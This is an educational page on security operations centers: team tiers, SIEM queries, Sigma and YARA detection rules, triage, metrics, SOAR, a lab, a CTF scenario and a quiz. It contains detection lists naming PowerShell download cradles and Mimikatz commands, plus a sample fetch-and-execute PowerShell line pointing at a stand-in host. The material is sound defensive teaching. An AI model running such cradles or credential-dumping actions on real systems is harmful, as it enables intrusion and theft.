
Blue Team & SOC Operations

The Security Operations Center (SOC) is the nerve center of an organization's defensive security capability. SOC analysts monitor, detect, investigate, and respond to security incidents around the clock. Blue team engineering goes further — building the detections, tuning the alerts, and designing the infrastructure that makes the SOC effective.

This page covers the operational structure of a SOC, the tools used for detection and investigation, how to build effective detection rules, and the metrics that measure SOC performance. If you want to understand what happens after an alert fires, this is where you start.

Related: Cybersecurity Overview | Red Team Operations | Active Directory | Malware Analysis


SOC Organizational Structure

SOC Tiers

Modern SOCs use a tiered model where analysts at different levels handle incidents of increasing complexity.

Roles and Responsibilities

| Tier | Title | Responsibilities | Skills Required | Avg Salary (US) |
| --- | --- | --- | --- | --- |
| L1 | SOC Analyst | Monitor dashboards, triage alerts, execute playbooks, escalate | SIEM basics, networking, OS fundamentals | $55K-$75K |
| L2 | Incident Responder | Investigate escalated incidents, perform containment, correlate events | Log analysis, malware triage, forensics | $75K-$110K |
| L3 | Threat Hunter / Detection Engineer | Proactive hunting, build detection rules, tune SIEM, tool development | Advanced forensics, scripting, ATT&CK expertise | $110K-$160K |
| | SOC Manager | Team leadership, metrics reporting, process improvement, vendor management | Leadership, communication, security strategy | $130K-$180K |

SIEM Platforms

Security Information and Event Management (SIEM) platforms aggregate logs from every source in the environment, correlate events, and trigger alerts.

SIEM Comparison

| Feature | Splunk Enterprise | Elastic SIEM | Microsoft Sentinel | QRadar |
| --- | --- | --- | --- | --- |
| Deployment | On-prem / Cloud | On-prem / Cloud | Cloud-only (Azure) | On-prem / Cloud |
| Query Language | SPL | KQL (Kibana Query Language) / Lucene | KQL (Kusto Query Language) | AQL |
| Pricing Model | Data volume (GB/day) | Nodes / self-managed | Data ingestion (GB/day) | EPS (events/sec) |
| Strengths | Mature ecosystem, SPL power | Open source core, cost-effective | Azure integration, AI/ML | IBM ecosystem, compliance |
| Weaknesses | Expensive at scale | Complex cluster management | Azure lock-in | Declining market share |
| Best For | Large enterprise, complex analysis | Cost-conscious, technical teams | Microsoft-heavy environments | Regulated industries |

Splunk SPL Essentials

spl
# Basic search: find failed logins in the last 24 hours
index=windows sourcetype=WinEventLog EventCode=4625 earliest=-24h
| stats count by src_ip, user
| where count > 10
| sort -count

# Detect Kerberoasting: TGS requests with RC4 encryption
# Field names follow the Splunk Add-on for Windows and may differ in your environment
index=windows sourcetype=WinEventLog EventCode=4769 Ticket_Encryption_Type=0x17
| search NOT Service_Name="*$"
| stats count by Service_Name, Client_Address
| where count > 5

# Detect lateral movement — PsExec-style service creation
index=windows sourcetype=WinEventLog EventCode=7045
| where Service_Name != "Windows Update" AND Service_Name != "BITS"
| table _time, ComputerName, Service_Name, Service_File_Name

# PowerShell suspicious commands
index=windows sourcetype=WinEventLog EventCode=4104
| search ScriptBlockText="*Invoke-Mimikatz*" OR ScriptBlockText="*Invoke-Kerberoast*"
| table _time, ComputerName, ScriptBlockText

# Network connection anomalies
index=firewall action=allowed dest_port=443
| stats count dc(dest_ip) as unique_destinations by src_ip
| where unique_destinations > 100
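
The aggregate-then-threshold pattern used in the first SPL query can be prototyped offline before it goes into a SIEM. The following is a minimal Python sketch, assuming events have already been parsed into dictionaries; the keys `event_code`, `src_ip`, and `user` are hypothetical names chosen to mirror the query, not a Splunk export format.

```python
from collections import Counter


def failed_login_hotspots(events, threshold=10):
    """Count failed logons (4625) per (src_ip, user) and keep pairs above the threshold."""
    counts = Counter(
        (e["src_ip"], e["user"]) for e in events if e.get("event_code") == 4625
    )
    # Mirrors `| where count > 10 | sort -count`
    hits = [(pair, n) for pair, n in counts.items() if n > threshold]
    return sorted(hits, key=lambda item: item[1], reverse=True)


# Synthetic sample data for illustration only
sample_events = (
    [{"event_code": 4625, "src_ip": "10.0.0.5", "user": "alice"}] * 12
    + [{"event_code": 4625, "src_ip": "10.0.0.9", "user": "bob"}] * 3
    + [{"event_code": 4624, "src_ip": "10.0.0.5", "user": "alice"}] * 50
)

hotspots = failed_login_hotspots(sample_events)
print(hotspots)
```

Filtering before sorting keeps the sort small, which is the same reason a `where` clause is usually placed ahead of `sort` in a search pipeline.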

Elastic SIEM / KQL

# KQL — Detect suspicious PowerShell execution
event.code: "4104" and powershell.file.script_block_text: (*downloadstring* or *invoke-expression* or *iex* or *bypass*)

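# ES|QL: failed authentication from multiple sources
# Kibana KQL only filters documents; it has no pipes or aggregations, so counting needs ES|QL or a threshold rule
# The index pattern logs-* is an assumption; use the pattern that holds your Windows events
FROM logs-*
| WHERE event.code == "4625"
| STATS failures = COUNT(*) BY source.ip, user.name
| WHERE failures > 10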

# KQL — Process execution from unusual paths
process.executable: (*\\Temp\\* or *\\AppData\\* or *\\Downloads\\*) and not process.name: (chrome.exe or firefox.exe or msedge.exe)

Microsoft Sentinel (KQL)

kql
// Detect brute force attacks
SecurityEvent
| where EventID == 4625
| summarize FailedAttempts = count() by TargetAccount, IpAddress, bin(TimeGenerated, 1h)
| where FailedAttempts > 20
| project TimeGenerated, TargetAccount, IpAddress, FailedAttempts

// Detect anomalous sign-ins (Azure AD)
SigninLogs
| where ResultType != "0"
| summarize FailureCount = count() by UserPrincipalName, IPAddress, Location
| where FailureCount > 10

// Detect DCSync indicators
SecurityEvent
| where EventID == 4662
| where Properties has "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
| where SubjectUserName !endswith "$"
| project TimeGenerated, SubjectUserName, ObjectName

Detection Engineering

Detection engineering is the practice of building, testing, and maintaining detection rules that identify malicious activity with high precision and low false positive rates.

Detection Lifecycle

Sigma Rules

Sigma is a vendor-agnostic format for detection rules. Write a rule once, then convert it to the query language of any SIEM that has a Sigma backend.

yaml
# Sigma rule — Detect suspicious PowerShell execution
title: Suspicious PowerShell Download Cradle
id: 3b6ab547-8ec2-4991-b5b6-1e5d7fd6f5f3
status: stable
description: Detects PowerShell commands commonly used to download and execute payloads
author: SOC Team
date: 2026/03/20
references:
    - https://attack.mitre.org/techniques/T1059/001/
tags:
    - attack.execution
    - attack.t1059.001
logsource:
    product: windows
    category: ps_script
    definition: 'Script Block Logging must be enabled'
detection:
    selection_download:
        ScriptBlockText|contains:
            - 'DownloadString'
            - 'DownloadFile'
            - 'Invoke-WebRequest'
            - 'wget '
            - 'curl '
            - 'Start-BitsTransfer'
    selection_exec:
        ScriptBlockText|contains:
            - 'Invoke-Expression'
            - 'IEX('
            - 'IEX ('
            - 'iex('
    condition: selection_download and selection_exec
falsepositives:
    - Legitimate admin scripts that download and execute
    - Software deployment tools
level: high
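
To make the rule's logic concrete, here is a minimal Python sketch of what the condition `selection_download and selection_exec` evaluates. It assumes Sigma's default behavior that `contains` matches case-insensitively and that a list of values is an OR. The function names are hypothetical, and this is an illustration of the matching logic, not how any Sigma backend is implemented.

```python
DOWNLOAD_TERMS = [
    "DownloadString", "DownloadFile", "Invoke-WebRequest",
    "wget ", "curl ", "Start-BitsTransfer",
]
EXEC_TERMS = ["Invoke-Expression", "IEX(", "IEX ("]


def contains_any(text, terms):
    """True if any term occurs in text, ignoring case (a list of values is an OR)."""
    lowered = text.lower()
    return any(term.lower() in lowered for term in terms)


def matches_download_cradle(script_block_text):
    """Both selections must match, as in `selection_download and selection_exec`."""
    return contains_any(script_block_text, DOWNLOAD_TERMS) and contains_any(
        script_block_text, EXEC_TERMS
    )


cradle = "IEX (New-Object Net.WebClient).DownloadString('http://example.test/a.ps1')"
download_only = "Invoke-WebRequest -Uri http://example.test/f.zip -OutFile f.zip"

print(matches_download_cradle(cradle))         # download and execute together
print(matches_download_cradle(download_only))  # download without execution
```

Because matching is case-insensitive under that assumption, a single `IEX(` entry already covers `iex(`, so listing both casings in a rule is redundant rather than harmful.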
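
bash
# Convert Sigma rules to SIEM-specific formats
# Install sigma-cli (the pySigma-based converter that replaces the legacy sigmac tool)
pip install sigma-cli

# Backends ship as plugins; list what is available and install what you need
sigma plugin list
sigma plugin install splunk

# Convert to Splunk SPL (the splunk_windows pipeline maps Windows log sources and field names)
sigma convert -t splunk -p splunk_windows suspicious_powershell.yml

# Convert to an Elasticsearch Lucene query (requires the elasticsearch plugin)
sigma convert -t lucene -p ecs_windows suspicious_powershell.yml

# Convert to Kusto KQL for Microsoft Sentinel (requires the kusto plugin)
# Target and pipeline names vary by plugin version; confirm with `sigma list targets` and `sigma list pipelines`
sigma convert -t kusto -p sentinel_asim suspicious_powershell.yml

# Bulk convert an entire ruleset into a single output file
sigma convert -t splunk -p splunk_windows rules/ -o splunk_rules.txt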

YARA Rules

YARA identifies and classifies malware based on textual or binary patterns. It is used for file scanning, memory scanning, and threat hunting.

yara
rule Mimikatz_Detection {
    meta:
        description = "Detects Mimikatz credential dumping tool"
        author = "SOC Team"
        severity = "critical"
        reference = "https://attack.mitre.org/software/S0002/"

    strings:
        $s1 = "sekurlsa::logonpasswords" ascii wide
        $s2 = "sekurlsa::wdigest" ascii wide
        $s3 = "lsadump::dcsync" ascii wide
        $s4 = "kerberos::golden" ascii wide
        $s5 = "mimikatz" ascii wide nocase
        $s6 = "gentilkiwi" ascii wide

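        // Raw ASCII bytes for "Mimikatz" and "mimikatz"; these duplicate $s5 and do not catch packed or obfuscated variants
        $b1 = { 4D 69 6D 69 6B 61 74 7A }
        $b2 = { 6D 69 6D 69 6B 61 74 7A }

    condition:
        // Parentheses matter: "and" binds tighter than "or", so without them the byte-pattern branch would also match non-PE files
        uint16(0) == 0x5A4D and  // PE file
        (any of ($s*) or 2 of ($b*))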
}

rule Cobalt_Strike_Beacon {
    meta:
        description = "Detects Cobalt Strike beacon payloads"
        author = "SOC Team"
        severity = "critical"

    strings:
        $config = { 00 01 00 01 00 02 ?? ?? 00 02 00 01 00 02 ?? ?? }
        $sleep_mask = "SleepMask" ascii
        $pipe = "\\\\.\\pipe\\msagent_" ascii

    condition:
        uint16(0) == 0x5A4D and
        ($config or $sleep_mask or $pipe)
}
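
The building blocks these rules rely on are simple to reproduce, which helps when reasoning about why a rule did or did not match. The Python sketch below, offered as an illustration rather than a substitute for the YARA engine, shows what `uint16(0) == 0x5A4D` checks and what the `ascii wide` modifiers mean. The function names and the shortened string list are assumptions.

```python
import struct

# A small subset of the strings from the Mimikatz rule
STRINGS = ["sekurlsa::logonpasswords", "lsadump::dcsync"]


def is_pe(data: bytes) -> bool:
    """Equivalent of `uint16(0) == 0x5A4D`: little-endian 16-bit value at offset 0 ("MZ")."""
    return len(data) >= 2 and struct.unpack_from("<H", data, 0)[0] == 0x5A4D


def has_string(data: bytes, text: str) -> bool:
    """`ascii wide`: match the plain ASCII bytes or the UTF-16LE encoding."""
    return text.encode("ascii") in data or text.encode("utf-16-le") in data


def scan(data: bytes) -> bool:
    """PE header AND at least one string, grouped explicitly."""
    return is_pe(data) and any(has_string(data, s) for s in STRINGS)


pe_with_ascii = b"MZ" + b"\x00" * 16 + b"sekurlsa::logonpasswords"
pe_with_wide = b"MZ" + b"\x00" * 16 + "lsadump::dcsync".encode("utf-16-le")
analyst_notes = b"Attacker ran sekurlsa::logonpasswords on WS-042"

print(scan(pe_with_ascii), scan(pe_with_wide), scan(analyst_notes))
```

The last sample shows why the PE check is worth keeping: a text file that merely mentions a Mimikatz command contains the string but is not an executable.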

Threat Intelligence

Threat Intelligence Lifecycle

Intelligence Types

| Type | Description | Example | Consumer |
| --- | --- | --- | --- |
| Strategic | High-level trends, motivations, geopolitics | "APT28 is targeting NATO defense contractors" | Leadership, CISO |
| Tactical | TTPs used by adversaries, mapped to ATT&CK | "Threat actors use DLL sideloading via OneDrive" | Detection engineers |
| Operational | Specific campaigns, timelines, infrastructure | "Campaign X uses domain evil.com, IP 1.2.3.4" | Incident responders |
| Technical | IOCs: hashes, IPs, domains, URLs | malware.exe SHA256: abc123... | SIEM, EDR, firewalls |

Threat Intel Platforms & Feeds

| Platform | Type | Cost | Strengths |
| --- | --- | --- | --- |
| MISP | Open source TIP | Free | Community sharing, STIX/TAXII |
| OpenCTI | Open source TIP | Free | Knowledge graph, ATT&CK mapping |
| AlienVault OTX | Community feed | Free | Large community, pulse system |
| VirusTotal | File/URL analysis | Free tier + Enterprise | Multi-AV scanning, behavior |
| Recorded Future | Commercial TIP | $$$$ | AI-powered, comprehensive |
| CrowdStrike Falcon Intel | Commercial feed | $$$ | Actor profiles, real-time alerts |
| Abuse.ch | Community feeds | Free | URLhaus, MalwareBazaar, ThreatFox |
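
Technical intelligence is consumed by matching indicators against event fields. The sketch below shows one way that lookup could work in Python. It assumes indicators have already been pulled from a feed into memory; the `Indicator` class, the event field names (`dest_ip`, `dns_query`, `file_sha256`), and the feed name are all hypothetical and do not correspond to any platform's API.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Indicator:
    kind: str    # "ip", "domain", or "sha256"
    value: str
    source: str  # feed the indicator came from


# Which event field carries which indicator type (assumed field names)
FIELD_KINDS = {"dest_ip": "ip", "dns_query": "domain", "file_sha256": "sha256"}


def build_index(indicators):
    """Index indicators by (kind, lowercased value) for constant-time lookups."""
    return {(ioc.kind, ioc.value.lower()): ioc for ioc in indicators}


def match_event(event, index):
    """Return every indicator that matches a field of the event."""
    hits = []
    for field_name, kind in FIELD_KINDS.items():
        value = event.get(field_name)
        if value is not None:
            ioc = index.get((kind, value.lower()))
            if ioc is not None:
                hits.append(ioc)
    return hits


# Documentation-range IP and reserved example domain, not real indicators
feed = [
    Indicator("ip", "203.0.113.7", "example-feed"),
    Indicator("domain", "bad.example", "example-feed"),
]
index = build_index(feed)
event = {"src_ip": "10.0.0.12", "dest_ip": "203.0.113.7", "dns_query": "BAD.example"}

hits = match_event(event, index)
print([h.value for h in hits])
```

Normalizing case on both sides avoids missed matches on domains and hashes, which feeds and log sources often record with different casing.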

Alert Triage Workflow

A structured triage workflow prevents alert fatigue and ensures consistent investigation quality.

Triage Checklist

markdown
## Alert Triage Template

### 1. Initial Assessment (< 5 minutes)
- [ ] Read alert title and description
- [ ] Check if source IP/user is known (VIP, service account, scanner)
- [ ] Check alert history — has this fired before? How was it resolved?
- [ ] Check threat intel — are IOCs in any feeds?

### 2. Context Gathering (< 15 minutes)
- [ ] Pivot on source IP: What other activity from this IP in the last 24h?
- [ ] Pivot on user: Is this normal behavior for this user/role?
- [ ] Pivot on destination: Is this a legitimate service/server?
- [ ] Check EDR: Any endpoint alerts on the same host?
- [ ] Check network: Any unusual traffic patterns?

### 3. Decision
- [ ] False Positive → Document, tune rule, close
- [ ] True Positive, benign → Document, close (consider policy)
- [ ] True Positive, malicious → Escalate, begin IR

Reducing Alert Fatigue

A large SOC can receive thousands of alerts per day, and most of them are typically false positives. To combat fatigue:

  1. Tune rules aggressively — Every FP that repeats should be filtered
  2. Use risk scoring — Aggregate low-fidelity signals into high-confidence alerts
  3. Automate triage — SOAR playbooks handle repetitive investigation steps
  4. Enrich automatically — Auto-lookup IPs, hashes, domains against threat intel
  5. Track FP rates per rule — Rules above 90% FP rate need rewriting or removal
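
Two of the points above, risk scoring and per-rule false positive tracking, reduce to small aggregations. The Python sketch below illustrates both under stated assumptions: the signal names, weights, and the threshold of 60 are invented for the example, and the 90% cutoff is the one mentioned in the list.

```python
from collections import defaultdict

# Hypothetical weights for low-fidelity signals; tune these to your environment
SIGNAL_WEIGHTS = {
    "encoded_powershell": 40,
    "new_admin_logon": 30,
    "rare_parent_process": 20,
    "outbound_to_new_destination": 15,
}


def risk_alerts(signals, threshold=60):
    """Sum signal weights per host, counting each signal type once, and alert at the threshold."""
    seen = set()
    scores = defaultdict(int)
    for host, signal in signals:
        if (host, signal) in seen:
            continue
        seen.add((host, signal))
        scores[host] += SIGNAL_WEIGHTS.get(signal, 0)
    return {host: score for host, score in scores.items() if score >= threshold}


def rules_to_rewrite(dispositions, max_fp_rate=0.90):
    """Return rules whose share of false-positive closures exceeds max_fp_rate."""
    fp = defaultdict(int)
    total = defaultdict(int)
    for rule, verdict in dispositions:
        total[rule] += 1
        if verdict == "false_positive":
            fp[rule] += 1
    return sorted(rule for rule in total if fp[rule] / total[rule] > max_fp_rate)


signals = [
    ("ws-01", "encoded_powershell"),
    ("ws-01", "rare_parent_process"),
    ("ws-01", "encoded_powershell"),  # repeat of the same signal is not double counted
    ("ws-02", "outbound_to_new_destination"),
]
dispositions = (
    [("rule_a", "false_positive")] * 19
    + [("rule_a", "true_positive")]
    + [("rule_b", "false_positive"), ("rule_b", "true_positive")]
)

print(risk_alerts(signals))
print(rules_to_rewrite(dispositions))
```

Counting each signal type once per host is a design choice that keeps one noisy rule from pushing a host over the threshold on its own.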

SOC KPIs and Metrics

Key Performance Indicators

| Metric | Definition | Target | How to Improve |
| --- | --- | --- | --- |
| MTTD (Mean Time to Detect) | Time from attack to first alert | < 24 hours | Better detection rules, more log sources |
| MTTR (Mean Time to Respond) | Time from alert to containment | < 4 hours | SOAR automation, clear playbooks |
| MTTA (Mean Time to Acknowledge) | Time from alert to analyst assignment | < 15 minutes | Proper staffing, alert routing |
| False Positive Rate | % of alerts that are benign | < 40% | Tune rules, add context, risk scoring |
| Detection Coverage | % of ATT&CK techniques with detections | > 70% | Gap analysis, new data sources |
| Alert Volume | Alerts per analyst per shift | < 50 actionable | Tune, deduplicate, automate |
| Dwell Time | Time attacker is undetected in network | < 7 days | Threat hunting, better visibility |
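
The time-based metrics follow directly from four timestamps per incident. The following Python sketch computes MTTD, MTTA, and MTTR using the definitions in the table. The incident record layout (`attack_start`, `first_alert`, `acknowledged`, `contained`) is an assumption for illustration, and the sample incidents are synthetic.

```python
from datetime import datetime, timedelta
from statistics import mean


def mean_delta(incidents, start_key, end_key):
    """Average elapsed time between two timestamps across incidents."""
    seconds = mean((i[end_key] - i[start_key]).total_seconds() for i in incidents)
    return timedelta(seconds=seconds)


def soc_kpis(incidents):
    return {
        "MTTD": mean_delta(incidents, "attack_start", "first_alert"),  # attack to first alert
        "MTTA": mean_delta(incidents, "first_alert", "acknowledged"),  # alert to analyst assignment
        "MTTR": mean_delta(incidents, "first_alert", "contained"),     # alert to containment
    }


# Synthetic incidents for illustration only
incidents = [
    {
        "attack_start": datetime(2024, 1, 1, 0, 0),
        "first_alert": datetime(2024, 1, 1, 2, 0),
        "acknowledged": datetime(2024, 1, 1, 2, 10),
        "contained": datetime(2024, 1, 1, 5, 0),
    },
    {
        "attack_start": datetime(2024, 1, 2, 0, 0),
        "first_alert": datetime(2024, 1, 2, 6, 0),
        "acknowledged": datetime(2024, 1, 2, 6, 20),
        "contained": datetime(2024, 1, 2, 7, 0),
    },
]

kpis = soc_kpis(incidents)
for name, value in kpis.items():
    print(name, value)
```

In practice the attack start time is usually estimated during the investigation, so MTTD is only as accurate as the forensic timeline behind it.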

Log Sources and Visibility

A SOC is only as good as its data sources. Missing logs mean missed attacks.

| Log Source | What It Shows | Critical Events |
| --- | --- | --- |
| Windows Security Log | Authentication, process creation, object access | 4624, 4625, 4688, 4662, 4769 |
| Sysmon | Enhanced process, network, file monitoring | Event 1 (process), 3 (network), 11 (file create) |
| EDR Telemetry | Endpoint behavior, process trees, file writes | Varies by vendor |
| Firewall Logs | Network connections allowed/denied | Outbound to suspicious IPs/ports |
| DNS Logs | Domain resolution queries | Queries to known-bad domains, DGA patterns |
| Proxy/Web Gateway | HTTP/S traffic, URLs visited | Downloads of executables, C2 traffic |
| Email Gateway | Inbound/outbound email, attachments | Phishing attempts, malicious attachments |
| Cloud Audit Logs | API calls, IAM changes, resource creation | Privilege escalation, data access |
| Authentication Logs | SSO, MFA, VPN logins | Impossible travel, credential stuffing |

Critical: Enable These Logs

Many organizations lack visibility because key logs are not enabled:

  • PowerShell Script Block Logging (Event 4104) — Reveals obfuscated PowerShell
  • Sysmon — Provides process, network, and file visibility far beyond default Windows logging
  • Windows command-line audit (Event 4688 with process command line) — Shows what processes are doing
  • DNS query logging — Essential for detecting C2, tunneling, and DGA domains

SOAR (Security Orchestration, Automation, and Response)

SOAR platforms automate repetitive SOC tasks through playbooks.

| Platform | Type | Strengths |
| --- | --- | --- |
| Splunk SOAR (Phantom) | Commercial | Deep Splunk integration |
| Microsoft Sentinel + Logic Apps | Cloud | Azure ecosystem |
| Cortex XSOAR (Palo Alto) | Commercial | Large integration library |
| Shuffle | Open source | Free, community-driven |
| TheHive | Open source | Case management + Cortex analyzers |

Example SOAR Playbook: Phishing Triage
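
As a rough illustration of what such a playbook automates, the Python sketch below models the decision logic only: extract indicators from a reported email, check them against threat intelligence, then either contain or hand off to an analyst. Everything here is hypothetical, including the `PhishingReport` fields, the action names, and the `is_known_bad` callback that stands in for a real enrichment lookup. It is not the workflow format of any SOAR product.

```python
from dataclasses import dataclass, field


@dataclass
class PhishingReport:
    reporter: str
    sender: str
    urls: list = field(default_factory=list)
    attachment_hashes: list = field(default_factory=list)


def triage_phishing(report, is_known_bad):
    """Enrich indicators, then choose containment or analyst review.

    is_known_bad is a callable(indicator) -> bool standing in for a threat-intel lookup.
    """
    indicators = report.urls + report.attachment_hashes
    malicious = [i for i in indicators if is_known_bad(i)]
    if malicious:
        verdict = "malicious"
        actions = ["quarantine_email", "block_indicators", "open_incident"]
    else:
        # No known-bad indicator is not proof of safety, so a person still looks at it
        verdict = "needs_review"
        actions = ["route_to_analyst"]
    return {"verdict": verdict, "actions": actions, "malicious_indicators": malicious}


known_bad = {"http://bad.example/login"}  # synthetic indicator on a reserved domain
report = PhishingReport(
    reporter="user@corp.example",
    sender="it-support@bad.example",
    urls=["http://bad.example/login"],
)

result = triage_phishing(report, lambda indicator: indicator in known_bad)
print(result["verdict"], result["actions"])
```

Passing the lookup in as a function keeps the decision logic testable without network access and lets the same flow run against different intelligence sources.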


Further Reading


Key Takeaway

  • A SOC is only as good as its data sources: missing logs mean missed attacks. Enable Sysmon, PowerShell Script Block Logging, and DNS query logging before anything else
  • Sigma rules provide vendor-agnostic detection: write once, convert to Splunk SPL, an Elastic query, or Sentinel KQL with sigma convert, then tune the output for each platform
  • The biggest enemy of a SOC is alert fatigue: tune aggressively, automate triage with SOAR, and track false positive rates per rule
Hands-On Lab

Lab: Build a Detection Engineering Pipeline

  1. Set up a free Elastic SIEM instance (or Wazuh) on a lab VM
  2. Configure Windows Event forwarding from a test workstation with Sysmon installed
  3. Write a Sigma rule to detect Mimikatz execution (look for process name or command-line patterns)
  4. Convert the Sigma rule to your SIEM's query language using sigma convert
  5. Deploy the detection rule in your SIEM
  6. Execute a Mimikatz simulation using Atomic Red Team (Invoke-AtomicTest T1003.001)
  7. Verify the alert fires, then tune it to reduce false positives from legitimate LSASS access
  8. Create a SOAR playbook that automatically enriches alerts with VirusTotal lookups
CTF Challenge

Challenge: The Phantom Lateral Movement

Your SIEM shows a successful logon (Event ID 4624, Logon Type 3) from workstation WS-042 to server SRV-DB-01 at 2:17 AM using the svc_sql account. No legitimate admin activity was scheduled. Investigate the alert and determine: Is this a true positive? What attack technique was used? What should be contained?

Hints:

  1. Check Event ID 4769 on the DC around 2:15 AM for TGS requests
  2. Look for Event ID 7045 on SRV-DB-01 for new service creation
  3. Check if svc_sql is a Kerberoastable service account
Answer

Event ID 4769 at 2:15 AM shows a TGS request for svc_sql with RC4 encryption (type 0x17) from WS-042 — Kerberoasting. The attacker cracked the service ticket offline and used the password for lateral movement. Event ID 7045 on SRV-DB-01 shows a new service BTOBTO created by svc_sql — PsExec-style execution. Contain: isolate WS-042 and SRV-DB-01, reset svc_sql password, convert to gMSA. Flag: CTF{kerberoast_lateral_move_detected}.
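
The correlation in this answer can be expressed as a small search over normalized events. The Python sketch below links an RC4 TGS request to a later network logon by the same account from the same source, then to service installs on the target. The event dictionary layout, the DC hostname `DC-01`, the calendar date, and the 02:18 timestamp for the service install are assumptions added for illustration; only the hosts, account, event IDs, and the 2:15 and 2:17 times come from the scenario.

```python
from datetime import datetime, timedelta


def find_kerberoast_chains(events, window=timedelta(minutes=30)):
    """Link RC4 TGS requests (4769) to a later type 3 logon (4624) and service installs (7045)."""
    chains = []
    for tgs in events:
        if tgs["event_id"] != 4769 or tgs.get("enc_type") != "0x17":
            continue
        for logon in events:
            if logon["event_id"] != 4624 or logon.get("logon_type") != 3:
                continue
            same_actor = (
                logon["account"] == tgs["account"]
                and logon["src_host"] == tgs["src_host"]
            )
            in_window = timedelta(0) <= logon["time"] - tgs["time"] <= window
            if not (same_actor and in_window):
                continue
            services = [
                e["service_name"]
                for e in events
                if e["event_id"] == 7045
                and e["host"] == logon["host"]
                and e["account"] == tgs["account"]
                and e["time"] >= logon["time"]
            ]
            chains.append({
                "account": tgs["account"],
                "source": tgs["src_host"],
                "target": logon["host"],
                "new_services": services,
            })
    return chains


day = datetime(2024, 1, 15)  # hypothetical date
events = [
    {"event_id": 4769, "time": day.replace(hour=2, minute=15), "host": "DC-01",
     "account": "svc_sql", "src_host": "WS-042", "enc_type": "0x17"},
    {"event_id": 4624, "time": day.replace(hour=2, minute=17), "host": "SRV-DB-01",
     "account": "svc_sql", "src_host": "WS-042", "logon_type": 3},
    {"event_id": 7045, "time": day.replace(hour=2, minute=18), "host": "SRV-DB-01",
     "account": "svc_sql", "service_name": "BTOBTO"},
]

chains = find_kerberoast_chains(events)
print(chains)
```

The 30-minute window is arbitrary; offline cracking can take much longer, so a real hunt would widen it or drop the upper bound.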


Common Misconceptions

  • "More alerts mean better security" — Alert volume without context creates fatigue. Quality (high true positive rate) matters more than quantity.
  • "SIEM deployment means threats are detected" — A SIEM without tuned rules, sufficient log sources, and trained analysts is just an expensive log storage solution.
  • "Threat hunting is just running queries" — True threat hunting starts with a hypothesis based on threat intelligence, systematically searches for evidence, and creates new detections from findings.
  • "Sigma rules replace SIEM-specific rules" — Sigma provides portability, but converted rules often need platform-specific tuning for field names, log formats, and performance optimization.
  • "L1 analysts just click buttons" — Effective L1 triage requires understanding networking, OS internals, and attacker TTPs. The role is the foundation of SOC effectiveness.
Quiz

1. What is the primary advantage of Sigma detection rules?

a) They are faster than native SIEM rules
b) They are vendor-agnostic and can be converted to any SIEM platform
c) They automatically block threats
d) They replace YARA rules

Answer

b) Sigma rules are written in a universal YAML format and can be converted to Splunk SPL, Elastic KQL, Microsoft Sentinel KQL, and other SIEM query languages.

2. What SOC metric measures the time from an attack starting to the first alert firing?

a) MTTR (Mean Time to Respond)
b) MTTD (Mean Time to Detect)
c) MTTA (Mean Time to Acknowledge)
d) SLA compliance rate

Answer

b) MTTD measures the elapsed time between when an attack begins and when the SOC's first alert fires. Lower MTTD means faster detection.

3. Which Windows Event ID reveals the full text of PowerShell scripts executed on a system?

a) 4624
b) 4688
c) 4104
d) 7045

Answer

c) Event ID 4104 (PowerShell Script Block Logging) captures the full text of every PowerShell script executed, including deobfuscated content. This is critical for detecting encoded or obfuscated PowerShell attacks.

4. What is the purpose of SOAR in a SOC?

a) Replacing analysts entirely
b) Automating repetitive triage and response tasks through playbooks
c) Storing log data more efficiently
d) Training new analysts

Answer

b) SOAR (Security Orchestration, Automation, and Response) automates repetitive investigation steps like IOC enrichment, email quarantine, and IP blocking, freeing analysts for complex analysis.

5. What should a SOC do when a detection rule has a 95% false positive rate?

a) Ignore all alerts from that rule
b) Disable the rule entirely
c) Rewrite or tune the rule to improve precision, or remove it
d) Increase the alert priority

Answer

c) A rule with 95% FP rate wastes analyst time and contributes to alert fatigue. It should be rewritten with more specific conditions, additional context filters, or removed if it cannot be improved.


One-Liner Summary: The blue team's job is not to prevent every attack — it is to detect, contain, and recover faster than the attacker can cause damage.

"What I cannot create, I do not understand." — Richard Feynman